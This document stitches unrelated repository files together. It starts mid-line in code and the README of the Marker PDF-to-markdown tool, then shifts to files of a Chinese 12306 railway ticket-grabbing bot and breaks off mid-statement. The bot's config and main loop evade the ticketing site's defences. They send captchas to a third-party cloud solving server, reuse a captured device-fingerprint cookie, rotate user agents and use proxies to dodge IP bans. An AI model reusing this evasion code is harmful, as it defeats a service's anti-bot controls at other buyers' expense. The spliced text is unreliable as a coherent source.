PDFFONT_NONSYMBOLIC flag_descriptions.append("non_symbolic") if flags & (1 << 6): # PDFFONT_ITALIC flag_descriptions.append("italic") if flags & (1 << 16): # PDFFONT_ALLCAP flag_descriptions.append("all_cap") if flags & (1 << 17): # PDFFONT_SMALLCAP flag_descriptions.append("small_cap") if flags & (1 << 18): # PDFFONT_FORCEBOLD flag_descriptions.append("bold") if flags & (1 << 19): # PDFFONT_USEEXTERNATTR flag_descriptions.append("use_extern_attr") return "_".join(flag_descriptions) def sort_block_group(blocks, tolerance=1.25): vertical_groups = {} for block in blocks: if hasattr(block, "bbox"): bbox = block.bbox else: bbox = block["bbox"] group_key = round(bbox[1] / tolerance) * tolerance if group_key not in vertical_groups: vertical_groups[group_key] = [] vertical_groups[group_key].append(block) # Sort each group horizontally and flatten the groups into a single list sorted_blocks = [] for _, group in sorted(vertical_groups.items()): sorted_group = sorted(group, key=lambda x: x.bbox[0] if hasattr(x, "bbox") else x["bbox"][0]) sorted_blocks.extend(sorted_group) return sorted_blocks File: marker/pdf/images.py import pypdfium2 as pdfium from pypdfium2 import PdfPage from marker.schema.page import Page from marker.schema.bbox import rescale_bbox from marker.settings import settings def render_image(page: pdfium.PdfPage, dpi): image = page.render( scale=dpi / 72, draw_annots=False ).to_pil() image = image.convert("RGB") return image def render_bbox_image(page_obj: PdfPage, page: Page, bbox): png_image = render_image(page_obj, settings.IMAGE_DPI) # Rescale original pdf bbox bounds to match png image size png_bbox = [0, 0, png_image.size[0], png_image.size[1]] rescaled_merged = rescale_bbox(page.bbox, png_bbox, bbox) # Crop out only the equation image png_image = png_image.crop(rescaled_merged) png_image = png_image.convert("RGB") return png_image File: marker/schema/page.py from collections import Counter from typing import List, Optional, Dict, Any from marker.schema.bbox import BboxElement from marker.schema.block import Block, Span from surya.schema import TextDetectionResult, LayoutResult, OrderResult class Page(BboxElement): blocks: List[Block] pnum: int rotation: Optional[int] = None # Rotation degrees of the page text_lines: Optional[TextDetectionResult] = None layout: Optional[LayoutResult] = None order: Optional[OrderResult] = None ocr_method: Optional[str] = None # One of "surya" or "tesseract" char_blocks: Optional[List[Dict]] = None # Blocks with character-level data from pdftext images: Optional[List[Any]] = None # Images to save along with the page, need Any to avoid pydantic error def get_nonblank_lines(self): lines = self.get_all_lines() nonblank_lines = [l for l in lines if l.prelim_text.strip()] return nonblank_lines def get_all_lines(self): lines = [l for b in self.blocks for l in b.lines] return lines def get_nonblank_spans(self) -> List[Span]: lines = [l for b in self.blocks for l in b.lines] spans = [s for l in lines for s in l.spans if s.text.strip()] return spans def get_font_sizes(self): font_sizes = [s.font_size for s in self.get_nonblank_spans()] return font_sizes def get_line_heights(self): heights = [l.bbox[3] - l.bbox[1] for l in self.get_nonblank_lines()] return heights @property def prelim_text(self): return "\n".join([b.prelim_text for b in self.blocks]) File: marker/schema/merged.py from collections import Counter from typing import List, Optional from pydantic import BaseModel from marker.schema.bbox import BboxElement class MergedLine(BboxElement): text: str fonts: List[str] def most_common_font(self): counter = Counter(self.fonts) return counter.most_common(1)[0][0] class MergedBlock(BboxElement): lines: List[MergedLine] pnum: int block_type: Optional[str] class FullyMergedBlock(BaseModel): text: str block_type: str File: marker/schema/block.py import math from typing import List, Optional from pydantic import field_validator import ftfy from marker.schema.bbox import BboxElement from marker.settings import settings class BlockType(BboxElement): block_type: str class Span(BboxElement): text: str span_id: str font: str font_weight: float font_size: float bold: Optional[bool] = None italic: Optional[bool] = None image: Optional[bool] = None @field_validator('text') @classmethod def fix_unicode(cls, text: str) -> str: return ftfy.fix_text(text) class Line(BboxElement): spans: List[Span] @property def prelim_text(self): return "".join([s.text for s in self.spans]) @property def start(self): return self.spans[0].bbox[0] class Block(BboxElement): lines: List[Line] pnum: int block_type: Optional[str] = None @property def prelim_text(self): return "\n".join([l.prelim_text for l in self.lines]) def filter_spans(self, bad_span_ids): new_lines = [] for line in self.lines: new_spans = [] for span in line.spans: if not span.span_id in bad_span_ids: new_spans.append(span) line.spans = new_spans if len(new_spans) > 0: new_lines.append(line) self.lines = new_lines def filter_bad_span_types(self): new_lines = [] for line in self.lines: new_spans = [] for span in line.spans: if self.block_type not in settings.BAD_SPAN_TYPES: new_spans.append(span) line.spans = new_spans if len(new_spans) > 0: new_lines.append(line) self.lines = new_lines def get_min_line_start(self): line_starts = [line.start for line in self.lines] if len(line_starts) == 0: return None return min(line_starts) def bbox_from_lines(lines: List[Line]): min_x = min([line.bbox[0] for line in lines]) min_y = min([line.bbox[1] for line in lines]) max_x = max([line.bbox[2] for line in lines]) max_y = max([line.bbox[3] for line in lines]) return [min_x, min_y, max_x, max_y] def split_block_lines(block: Block, split_line_idx: int): new_blocks = [] if split_line_idx >= len(block.lines): return [block] elif split_line_idx == 0: return [block] else: new_blocks.append(Block(lines=block.lines[:split_line_idx], bbox=bbox_from_lines(block.lines[:split_line_idx]), pnum=block.pnum)) new_blocks.append(Block(lines=block.lines[split_line_idx:], bbox=bbox_from_lines(block.lines[split_line_idx:]), pnum=block.pnum)) return new_blocks def find_insert_block(blocks: List[Block], bbox): nearest_match = None match_dist = None for idx, block in enumerate(blocks): try: dist = math.sqrt((block.bbox[1] - bbox[1]) ** 2 + (block.bbox[0] - bbox[0]) ** 2) except Exception as e: continue if nearest_match is None or dist < match_dist: nearest_match = idx match_dist = dist if nearest_match is None: return 0 return nearest_match File: marker/schema/bbox.py from typing import List from pydantic import BaseModel, field_validator def should_merge_blocks(box1, box2, tol=5): # Within tol y px, and to the right within tol px merge = [ box2[0] > box1[0], # After in the x coordinate abs(box2[1] - box1[1]) < tol, # Within tol y px abs(box2[3] - box1[3]) < tol, # Within tol y px abs(box2[0] - box1[2]) < tol, # Within tol x px ] return all(merge) def merge_boxes(box1, box2): return (min(box1[0], box2[0]), min(box1[1], box2[1]), max(box2[2], box1[2]), max(box1[3], box2[3])) def boxes_intersect(box1, box2): # Box1 intersects box2 return box1[0] < box2[2] and box1[2] > box2[0] and box1[1] < box2[3] and box1[3] > box2[1] def box_intersection_pct(box1, box2): # determine the coordinates of the intersection rectangle x_left = max(box1[0], box2[0]) y_top = max(box1[1], box2[1]) x_right = min(box1[2], box2[2]) y_bottom = min(box1[3], box2[3]) if x_right < x_left or y_bottom < y_top: return 0.0 intersection_area = (x_right - x_left) * (y_bottom - y_top) bb1_area = (box1[2] - box1[0]) * (box1[3] - box1[1]) if bb1_area == 0: return 0.0 iou = intersection_area / bb1_area return iou def multiple_boxes_intersect(box1, boxes): for box2 in boxes: if boxes_intersect(box1, box2): return True return False def unnormalize_box(bbox, width, height): return [ width * (bbox[0] / 1000), height * (bbox[1] / 1000), width * (bbox[2] / 1000), height * (bbox[3] / 1000), ] class BboxElement(BaseModel): bbox: List[float] @field_validator('bbox') @classmethod def check_4_elements(cls, v: List[float]) -> List[float]: if len(v) != 4: raise ValueError('bbox must have 4 elements') return v @property def height(self): return self.bbox[3] - self.bbox[1] @property def width(self): return self.bbox[2] - self.bbox[0] @property def x_start(self): return self.bbox[0] @property def y_start(self): return self.bbox[1] @property def area(self): return self.width * self.height def intersection_pct(self, other_bbox: List[float]): if self.area == 0: return 0.0 return box_intersection_pct(self.bbox, other_bbox) def rescale_bbox(orig_dim, new_dim, bbox): page_width, page_height = new_dim[2] - new_dim[0], new_dim[3] - new_dim[1] detected_width, detected_height = orig_dim[2] - orig_dim[0], orig_dim[3] - orig_dim[1] width_scaler = detected_width / page_width height_scaler = detected_height / page_height new_bbox = [bbox[0] / width_scaler, bbox[1] / height_scaler, bbox[2] / width_scaler, bbox[3] / height_scaler] return new_bbox File: marker/debug/data.py import base64 import json import os from typing import List from marker.pdf.images import render_image from marker.schema.page import Page from marker.settings import settings from PIL import Image import io def dump_equation_debug_data(doc, images, converted_spans): if not settings.DEBUG_DATA_FOLDER or settings.DEBUG_LEVEL == 0: return if len(images) == 0: return # We attempted one conversion per image assert len(converted_spans) == len(images) data_lines = [] for idx, (pil_image, converted_span) in enumerate(zip(images, converted_spans)): if converted_span is None: continue # Image is a BytesIO object img_bytes = io.BytesIO() pil_image.save(img_bytes, format="WEBP", lossless=True) b64_image = base64.b64encode(img_bytes.getvalue()).decode("utf-8") data_lines.append({ "image": b64_image, "text": converted_span.text, "bbox": converted_span.bbox }) # Remove extension from doc name doc_base = os.path.basename(doc.name).rsplit(".", 1)[0] debug_file = os.path.join(settings.DEBUG_DATA_FOLDER, f"{doc_base}_equations.json") with open(debug_file, "w+") as f: json.dump(data_lines, f) def dump_bbox_debug_data(doc, fname, blocks: List[Page]): if not settings.DEBUG_DATA_FOLDER or settings.DEBUG_LEVEL < 2: return # Remove extension from doc name doc_base = fname.rsplit(".", 1)[0] debug_file = os.path.join(settings.DEBUG_DATA_FOLDER, f"{doc_base}_bbox.json") debug_data = [] for idx, page_blocks in enumerate(blocks): page = doc[idx] png_image = render_image(page, dpi=settings.TEXIFY_DPI) width, height = png_image.size max_dimension = 6000 if width > max_dimension or height > max_dimension: scaling_factor = min(max_dimension / width, max_dimension / height) png_image = png_image.resize((int(width * scaling_factor), int(height * scaling_factor)), Image.ANTIALIAS) img_bytes = io.BytesIO() png_image.save(img_bytes, format="WEBP", lossless=True, quality=100) b64_image = base64.b64encode(img_bytes.getvalue()).decode("utf-8") page_data = page_blocks.model_dump() page_data["image"] = b64_image debug_data.append(page_data) with open(debug_file, "w+") as f: json.dump(debug_data, f)
# Marker Marker converts PDF to markdown quickly and accurately. - Supports a wide range of documents (optimized for books and scientific papers) - Supports all languages - Removes headers/footers/other artifacts - Formats tables and code blocks - Extracts and saves images along with the markdown - Converts most equations to latex - Works on GPU, CPU, or MPS ## How it works Marker is a pipeline of deep learning models: - Extract text, OCR if necessary (heuristics, [surya](https://github.com/VikParuchuri/surya), tesseract) - Detect page layout and find reading order ([surya](https://github.com/VikParuchuri/surya)) - Clean and format each block (heuristics, [texify](https://github.com/VikParuchuri/texify) - Combine blocks and postprocess complete text (heuristics, [pdf_postprocessor](https://huggingface.co/vikp/pdf_postprocessor_t5)) It only uses models where necessary, which improves speed and accuracy. ## Examples | PDF | Type | Marker | Nougat | |-----------------------------------------------------------------------|-------------|--------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------| | [Think Python](https://greenteapress.com/thinkpython/thinkpython.pdf) | Textbook | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/thinkpython.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/thinkpython.md) | | [Think OS](https://greenteapress.com/thinkos/thinkos.pdf) | Textbook | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/thinkos.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/thinkos.md) | | [Switch Transformers](https://arxiv.org/pdf/2101.03961.pdf) | arXiv paper | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/switch_transformers.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/switch_transformers.md) | | [Multi-column CNN](https://arxiv.org/pdf/1804.07821.pdf) | arXiv paper | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/multicolcnn.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/multicolcnn.md) | ## Performance ![Benchmark overall](data/images/overall.png) The above results are with marker and nougat setup so they each take ~4GB of VRAM on an A6000. See [below](#benchmarks) for detailed speed and accuracy benchmarks, and instructions on how to run your own benchmarks. # Commercial usage I want marker to be as widely accessible as possible, while still funding my development/training costs. Research and personal usage is always okay, but there are some restrictions on commercial usage. The weights for the models are licensed `cc-by-nc-sa-4.0`, but I will waive that for any organization under $5M USD in gross revenue in the most recent 12-month period AND under $5M in lifetime VC/angel funding raised. If you want to remove the GPL license requirements (dual-license) and/or use the weights commercially over the revenue limit, check out the options [here](https://www.datalab.to). # Hosted API There's a hosted API for marker available [here](https://www.datalab.to/): - Supports PDFs, word documents, and powerpoints - 1/4th the price of leading cloud-based competitors - Leverages [Modal](https://modal.com/) for high reliability without latency spikes # Community [Discord](https://discord.gg//KuZwXNGnfH) is where we discuss future development. # Limitations PDF is a tricky format, so marker will not always work perfectly. Here are some known limitations that are on the roadmap to address: - Marker will not convert 100% of equations to LaTeX. This is because it has to detect then convert. - Tables are not always formatted 100% correctly - text can be in the wrong column. - Whitespace and indentations are not always respected. - Not all lines/spans will be joined properly. - This works best on digital PDFs that won't require a lot of OCR. It's optimized for speed, and limited OCR is used to fix errors. # Installation You'll need python 3.9+ and PyTorch. You may need to install the CPU version of torch first if you're not using a Mac or a GPU machine. See [here](https://pytorch.org/get-started/locally/) for more details. Install with: ```shell pip install marker-pdf ``` ## Optional: OCRMyPDF Only needed if you want to use the optional `ocrmypdf` as the ocr backend. Note that `ocrmypdf` includes Ghostscript, an AGPL dependency, but calls it via CLI, so it does not trigger the license provisions. See the instructions [here](docs/install_ocrmypdf.md) # Usage First, some configuration: - Inspect the settings in `marker/settings.py`. You can override any settings with environment variables. - Your torch device will be automatically detected, but you can override this. For example, `TORCH_DEVICE=cuda`. - By default, marker will use `surya` for OCR. Surya is slower on CPU, but more accurate than tesseract. It also doesn't require you to specify the languages in the document. If you want faster OCR, set `OCR_ENGINE` to `ocrmypdf`. This also requires external dependencies (see above). If you don't want OCR at all, set `OCR_ENGINE` to `None`. ## Interactive App I've included a streamlit app that lets you interactively try marker with some basic options. Run it with: ```shell pip install streamlit marker_gui ``` ## Convert a single file ```shell marker_single /path/to/file.pdf /path/to/output/folder --batch_multiplier 2 --max_pages 10 ``` - `--batch_multiplier` is how much to multiply default batch sizes by if you have extra VRAM. Higher numbers will take more VRAM, but process faster. Set to 2 by default. The default batch sizes will take ~3GB of VRAM. - `--max_pages` is the maximum number of pages to process. Omit this to convert the entire document. - `--langs` is an optional comma separated list of the languages in the document, for OCR. Optional by default, required if you use tesseract. - `--ocr_all_pages` is an optional argument to force OCR on all pages of the PDF. If this or the env var `OCR_ALL_PAGES` are true, OCR will be forced. The list of supported languages for surya OCR is [here](https://github.com/VikParuchuri/surya/blob/master/surya/languages.py). If you need more languages, you can use any language supported by [Tesseract](https://tesseract-ocr.github.io/tessdoc/Data-Files#data-files-for-version-400-november-29-2016) if you set `OCR_ENGINE` to `ocrmypdf`. If you don't need OCR, marker can work with any language. ## Convert multiple files ```shell marker /path/to/input/folder /path/to/output/folder --workers 4 --max 10 --min_length 10000 ``` - `--workers` is the number of pdfs to convert at once. This is set to 1 by default, but you can increase it to increase throughput, at the cost of more CPU/GPU usage. Marker will use 5GB of VRAM per worker at the peak, and 3.5GB average. - `--max` is the maximum number of pdfs to convert. Omit this to convert all pdfs in the folder. - `--min_length` is the minimum number of characters that need to be extracted from a pdf before it will be considered for processing. If you're processing a lot of pdfs, I recommend setting this to avoid OCRing pdfs that are mostly images. (slows everything down) - `--metadata_file` is an optional path to a json file with metadata about the pdfs. If you provide it, it will be used to set the language for each pdf. Setting language is optional for surya (default), but required for tesseract. The format is: ``` { "pdf1.pdf": {"languages": ["English"]}, "pdf2.pdf": {"languages": ["Spanish", "Russian"]}, ... } ``` You can use language names or codes. The exact codes depend on the OCR engine. See [here](https://github.com/VikParuchuri/surya/blob/master/surya/languages.py) for a full list for surya codes, and [here](https://tesseract-ocr.github.io/tessdoc/Data-Files#data-files-for-version-400-november-29-2016) for tesseract. ## Convert multiple files on multiple GPUs ```shell MIN_LENGTH=10000 METADATA_FILE=../pdf_meta.json NUM_DEVICES=4 NUM_WORKERS=15 marker_chunk_convert ../pdf_in ../md_out ``` - `METADATA_FILE` is an optional path to a json file with metadata about the pdfs. See above for the format. - `NUM_DEVICES` is the number of GPUs to use. Should be `2` or greater. - `NUM_WORKERS` is the number of parallel processes to run on each GPU. - `MIN_LENGTH` is the minimum number of characters that need to be extracted from a pdf before it will be considered for processing. If you're processing a lot of pdfs, I recommend setting this to avoid OCRing pdfs that are mostly images. (slows everything down) Note that the env variables above are specific to this script, and cannot be set in `local.env`. # Troubleshooting There are some settings that you may find useful if things aren't working the way you expect: - `OCR_ALL_PAGES` - set this to true to force OCR all pages. This can be very useful if the table layouts aren't recognized properly by default, or if there is garbled text. - `TORCH_DEVICE` - set this to force marker to use a given torch device for inference. - `OCR_ENGINE` - can set this to `surya` or `ocrmypdf`. - `DEBUG` - setting this to `True` shows ray logs when converting multiple pdfs - Verify that you set the languages correctly, or passed in a metadata file. - If you're getting out of memory errors, decrease worker count (increased the `VRAM_PER_TASK` setting). You can also try splitting up long PDFs into multiple files. In general, if output is not what you expect, trying to OCR the PDF is a good first step. Not all PDFs have good text/bboxes embedded in them. ## Useful settings These settings can improve/change output quality: - `OCR_ALL_PAGES` will force OCR across the document. Many PDFs have bad text embedded due to older OCR engines being used. - `PAGINATE_OUTPUT` will put a horizontal rule between pages. Default: False. - `EXTRACT_IMAGES` will extract images and save separately. Default: True. - `BAD_SPAN_TYPES` specifies layout blocks to remove from the markdown output. # Benchmarks Benchmarking PDF extraction quality is hard. I've created a test set by finding books and scientific papers that have a pdf version and a latex source. I convert the latex to text, and compare the reference to the output of text extraction methods. It's noisy, but at least directionally correct. Benchmarks show that marker is 4x faster than nougat, and more accurate outside arXiv (nougat was trained on arXiv data). We show naive text extraction (pulling text out of the pdf with no processing) for comparison. **Speed** | Method | Average Score | Time per page | Time per document | |--------|---------------|---------------|-------------------| | marker | 0.613721 | 0.631991 | 58.1432 | | nougat | 0.406603 | 2.59702 | 238.926 | **Accuracy** First 3 are non-arXiv books, last 3 are arXiv papers. | Method | multicolcnn.pdf | switch_trans.pdf | thinkpython.pdf | thinkos.pdf | thinkdsp.pdf | crowd.pdf | |--------|-----------------|------------------|-----------------|-------------|--------------|-----------| | marker | 0.536176 | 0.516833 | 0.70515 | 0.710657 | 0.690042 | 0.523467 | | nougat | 0.44009 | 0.588973 | 0.322706 | 0.401342 | 0.160842 | 0.525663 | Peak GPU memory usage during the benchmark is `4.2GB` for nougat, and `4.1GB` for marker. Benchmarks were run on an A6000 Ada. **Throughput** Marker takes about 4GB of VRAM on average per task, so you can convert 12 documents in parallel on an A6000. ![Benchmark results](data/images/per_doc.png) ## Running your own benchmarks You can benchmark the performance of marker on your machine. Install marker manually with: ```shell git clone https://github.com/VikParuchuri/marker.git poetry install ``` Download the benchmark data [here](https://drive.google.com/file/d/1ZSeWDo2g1y0BRLT7KnbmytV2bjWARWba/view?usp=sharing) and unzip. Then run the overall benchmark like this: ```shell python benchmark/overall.py data/pdfs data/references report.json --nougat ``` This will benchmark marker against other text extraction methods. It sets up batch sizes for nougat and marker to use a similar amount of GPU RAM for each. Omit `--nougat` to exclude nougat from the benchmark. I don't recommend running nougat on CPU, since it is very slow. ### Table benchmark There is a benchmark for table parsing, which you can run with: ```shell python benchmarks/table.py test_data/tables.json ``` # Thanks This work would not have been possible without amazing open source models and datasets, including (but not limited to): - Surya - Texify - Pypdfium2/pdfium - DocLayNet from IBM - ByT5 from Google Thank you to the authors of these models and datasets for making them available to the community!
12306
a495af88346a0d794493c6030f6a6207debb5824
File: run.py # -*- coding=utf-8 -*- import argparse import sys def parser_arguments(argv): """ 不应该在这里定义,先放在这里 :param argv: :return: """ parser = argparse.ArgumentParser() parser.add_argument("operate", type=str, help="r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱需要打开开关") return parser.parse_args(argv) if __name__ == '__main__': args = parser_arguments(sys.argv[1:]) if args.operate == "r": from init import select_ticket_info select_ticket_info.select().main() elif args.operate == "t": from config.emailConf import sendEmail from config.serverchanConf import sendServerChan sendEmail(u"订票小助手测试一下") sendServerChan("订票小助手测试一下") elif args.operate == "c": from agency.cdn_utils import filterCdn filterCdn() File: TickerConfig.py # -*- coding=utf-8 -*- # 关于软件使用配置说明,一定要看!!! # ps: 如果是候补车票,需要通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验 # 关于候补了之后是否还能继续捡漏的问题在此说明: 软件为全自动候补加捡漏,如果软件候补成功则会停止抢票,发出邮件通知,但是不会影响你继续捡漏, # 如果这个时候捡漏捡到的话,也是可以付款成功的,也就是说,捡漏+候补,可以最大程度提升抢票成功率 # 刷票模式:1=刷票 2=候补+刷票 TICKET_TYPE = 1 # 出发日期(list) "2018-01-06", "2018-01-07" STATION_DATES = [ "2020-01-18" ] # 填入需要购买的车次(list),"G1353" # 修改车次填入规则,注:(以前设置的车次逻辑不变),如果车次填入为空,那么就是当日乘车所有车次都纳入筛选返回 # 不填车次是整个list为空才算,如果不是为空,依然会判断车次的,这种是错误的写法 [""], 正确的写法 [] STATION_TRAINS = [] # 出发城市,比如深圳北,就填深圳就搜得到 FROM_STATION = "广州南" # 到达城市 比如深圳北,就填深圳就搜得到 TO_STATION = "隆回" # 座位(list) 多个座位ex: # "商务座", # "一等座", # "二等座", # "特等座", # "软卧", # "硬卧", # "硬座", # "无座", # "动卧", SET_TYPE = ["二等座"] # 当余票小于乘车人,如果选择优先提交,则删减联系人和余票数一致在提交 # bool IS_MORE_TICKET = True # 乘车人(list) 多个乘车人ex: # "张三", # "李四" TICKET_PEOPLES = [] # 12306登录账号 USER = "" PWD = "" # 加入小黑屋时间默认为5分钟,此功能为了防止僵尸票导致一直下单不成功错过正常的票 TICKET_BLACK_LIST_TIME = 5 # 自动打码 IS_AUTO_CODE = True # 设置2本地自动打码,需要配置tensorflow和keras库,3为云打码,由于云打码服务器资源有限(为2h4C的cpu服务器),请不要恶意请求,不然只能关闭服务器 # ps: 请不要一直依赖云服务器资源,在此向所有提供服务器同学表示感谢 AUTO_CODE_TYPE = 3 # 此处设置云打码服务器地址,如果有自建的服务器,可以自行更改 HOST = "120.77.154.140:8000" REQ_URL = "/verify/base64/" HTTP_TYPE = "http" # HOST="12306.yinaoxiong.cn" #备用服务器稳定性较差 # REQ_URL="/verify/base64/" # HTTP_TYPE="https" # 邮箱配置,如果抢票成功,将通过邮件配置通知给您 # 列举163 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "xxxxx # host: "smtp.163.com" # 列举qq ,qq设置比较复杂,需要在邮箱-->账户-->开启smtp服务,取得授权码==邮箱登录密码 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "授权码" # host: "smtp.qq.com" EMAIL_CONF = { "IS_MAIL": True, "email": "", "notice_email_list": "", "username": "", "password": "", "host": "smtp.qq.com", } # 是否开启 server酱 微信提醒, 使用前需要前往 http://sc.ftqq.com/3.version 扫码绑定获取 SECRET 并关注获得抢票结果通知的公众号 SERVER_CHAN_CONF = { "is_server_chan": False, "secret": "" } # 是否开启cdn查询,可以更快的检测票票 1为开启,2为关闭 IS_CDN = 1 # 下单接口分为两种,1 模拟网页自动捡漏下单(不稳定),2 模拟车次后面的购票按钮下单(稳如老狗) ORDER_TYPE = 2 # 下单模式 1 为预售,整点刷新,刷新间隔0.1-0.5S, 然后会校验时间,比如12点的预售,那脚本就会在12.00整检票,刷新订单 # 2 是捡漏,捡漏的刷新间隔时间为0.5-3秒,时间间隔长,不容易封ip ORDER_MODEL = 1 # 是否开启代理, 0代表关闭, 1表示开始 # 开启此功能的时候请确保代理ip是否可用,在测试放里面经过充分的测试,再开启此功能,不然可能会耽误你购票的宝贵时间 # 使用方法: # 1、在agency/proxy_list列表下填入代理ip # 2、测试UnitTest/TestAll/testProxy 测试代理是否可以用 # 3、开启代理ip IS_PROXY = 0 # 预售放票时间, 如果是捡漏模式,可以忽略此操作 OPEN_TIME = "12:59:57" # 1=使用selenium获取devicesID # 2=使用网页端/otn/HttpZF/logdevice获取devicesId,这个接口的算法目前可能有点问题,如果登录一直302的请改为配置1 # 3=自己打开浏览器在headers-Cookies中抓取RAIL_DEVICEID和RAIL_EXPIRATION,这个就不用配置selenium COOKIE_TYPE = 3 # 如果COOKIE_TYPE=1,则需配置chromeDriver路径,下载地址http://chromedriver.storage.googleapis.com/index.html # chromedriver配置版本只要和chrome的大版本匹配就行 CHROME_PATH = "/usr/src/app/chromedriver" # 为了docker37 准备的环境变量,windows环境可以不用管这个参数 CHROME_CHROME_PATH = "/opt/google/chrome/google-chrome" # 如果COOKIE_TYPE=3, 则需配置RAIL_EXPIRATION、RAIL_DEVICEID的值 RAIL_EXPIRATION = "" RAIL_DEVICEID = "" # RAIL_EXPIRATION = "1577034103293" # RAIL_DEVICEID = "CDno29Erc_Pf3FSXb4dzq-Op64EhWrsi5yUZKVIKR1MAfYo2qFlCeXD8VkexY7_1qg-ClV-fE8j9jgVlPZxRh3wVc2iqLe_5A8sdr62qZx4B22JPF8lFCjpgTKZ5ODW90HJd5tiQsJ1KR9nOqHRxHj1FT5LEIwfw" # 1=>为一直随机ua,2->只启动的时候随机一次ua RANDOM_AGENT = 2 PASSENGER_TICKER_STR = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } # 保护12306官网请求频率,设置随机请求时间,原则为5分钟不大于80次 # 最大间隔请求时间 MAX_TIME = 3 # 最小间隔请求时间 MIN_TIME = 1 # 软件版本 RE_VERSION = "1.2.004" File: __init__.py File: init/__init__.py File: init/select_ticket_info.py # -*- coding=utf-8 -*- import datetime import random import os import socket import sys import threading import time import TickerConfig import wrapcache from agency.cdn_utils import CDNProxy, open_cdn_file from config import urlConf, configCommon from config.TicketEnmu import ticket from config.configCommon import seat_conf_2, seat_conf from config.getCookie import getDrvicesID from init.login import GoLogin from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest from inter.ChechFace import chechFace from inter.CheckUser import checkUser from inter.GetPassengerDTOs import getPassengerDTOs from inter.LiftTicketInit import liftTicketInit from inter.Query import query from inter.SubmitOrderRequest import submitOrderRequest from myException.PassengerUserException import PassengerUserException from myException.UserPasswordException import UserPasswordException from myException.ticketConfigException import ticketConfigException from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException from myUrllib.httpUtils import HTTPClient class select: """ 快速提交车票通道 """ def __init__(self): self.cdn_list = open_cdn_file("filter_cdn_list") self.get_ticket_info() self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE] self.auto_code_type = TickerConfig.AUTO_CODE_TYPE self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list) self.httpClint.cdn = self.cdn_list[random.randint(0, 4)] self.urls = urlConf.urls self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type) self.cookies = "" self.queryUrl = "leftTicket/queryO" self.passengerTicketStrList = "" self.passengerTicketStrByAfterLate = "" self.oldPassengerStr = "" self.set_type = "" self.flag = True @staticmethod def get_ticket_info(): """ 获取配置信息 :return: """ print(u"*" * 50) print(f"检查当前版本为: {TickerConfig.RE_VERSION}") version = sys.version.split(" ")[0] print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version)) if version < "3.6.0": raise Exception print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:" u" 1群:286271084(已满)\n" u" 2群:649992274(已满)\n" u" 3群:632501142(已满)\n" u" 4群: 606340519(已满)\n" u" 5群: 948526733(已满)\n" u" 7群: 660689659(已满)\n" u" 8群: 620629239(已满)\n" u" 6群: 608792930(未满)\n" u" 9群: 693035807(未满)\n" ) print( f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \ f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}") print(u"*" * 50) def station_table(self, from_station, to_station): """ 读取车站信息 :param station: :return: """ path = os.path.join(os.path.dirname(__file__), '../station_name.txt') try: with open(path, encoding="utf-8") as result: info = result.read().split('=')[1].strip("'").split('@') except Exception: with open(path) as result: info = result.read().split('=')[1].strip("'").split('@') del info[0] station_name = {} for i in range(0, len(info)): n_info = info[i].split('|') station_name[n_info[1]] = n_info[2] try: from_station = station_name[from_station.encode("utf8")] to_station = station_name[to_station.encode("utf8")] except KeyError: from_station = station_name[from_station] to_station = station_name[to_station] return from_station, to_station def call_login(self, auth=False): """ 登录回调方法 :return: """ if auth: return self.login.auth() else: configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠 self.login.go_login() def main(self): l = liftTicketInit(self) l.reqLiftTicketInit() getDrvicesID(self) self.call_login() check_user = checkUser(self) t = threading.Thread(target=check_user.sendCheckUser) t.setDaemon(True) t.start() from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION) num = 0 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES) passenger = s.sendGetPassengerDTOs() wrapcache.set("user_info", passenger, timeout=9999999) now = datetime.datetime.now() if TickerConfig.ORDER_MODEL is 1: print(f"预售还未开始,阻塞中,预售时间为{TickerConfig.OPEN_TIME}, 当前时间为: {now.strftime('%H:%M:%S')}") sleep_time_s = 0.1 sleep_time_t = 0.3 # 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案 while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME: now = datetime.datetime.now() time.sleep(0.0001) print(f"预售开始,开启时间为: {now.strftime('%H:%M:%S')}") else: sleep_time_s = TickerConfig.MIN_TIME sleep_time_t = TickerConfig.MAX_TIME while 1: try: num 